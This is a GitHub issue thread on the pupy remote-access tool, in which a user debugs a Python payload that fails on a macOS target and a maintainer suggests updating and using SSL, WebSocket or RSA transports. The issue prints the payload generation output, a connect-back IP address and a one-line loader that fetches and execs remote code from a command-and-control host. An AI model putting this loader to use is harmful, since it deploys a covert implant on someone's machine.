### ISSUE TITLE
Issues running on MacOS Target machine

### ISSUE THREAD

**Issue by leveled** [n1nj4sec/pupy#717]
I'm running into an error while trying to run a simple python payload on MacOS. It seems to work in a clean virtualenv, which indicates that there may be some issue with Python Path. Given that the payload should work in a variety of idiosyncratic environments/installations I'd like to help investigate this issue and try and fix it. 

Generating the payload: 
```
>> >> gen -f py_oneliner connect --host xxx:8443 -t ssl
[+] Required credentials (found)
  + SSL_BIND_CERT
  + SSL_CA_CERT
  + SSL_CLIENT_CERT
  + SSL_BIND_KEY
  + SSL_CLIENT_KEY

{ Configuration }
KEY            VALUE
-------------------------------------------------
launcher       connect
launcher_args  --host 54.183.252.66:8443 -t ssl
cid            0x9f7cf010L

[+] Generating PY payload ...
[!] Python 2.7.x required, x should be >= 9
[+] Copy/paste this one-line loader to deploy pupy without writing on the disk
  + python -c 'import urllib;exec urllib.urlopen("http://xxx:9000/awarBip8Yc/C3ermq3rLz").read()'
```

Attempting to run the payload on the machine. 
```
➜  Downloads python -c 'import urllib;exec urllib.urlopen("http://xxx:9000/awarBip8Yc/C3ermq3rLz").read()'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 1, in <module>
  File "", line 10, in <module>

  File "pupyimporter", line 1026, in install
```

I ran into the same error when trying to use a standard python file payload as well. Please let me know what additional information I can provide to help resolve the issue.

**Comment by alxchk** [comment]
Try to update to the latest version. Also try `--debug`.
Do not use anything but ssl/ws/rsa transports - for MacOS we don't have neither native client nor support for embedding libs to pure python object. But standard python from MacOS is ok for basic things..
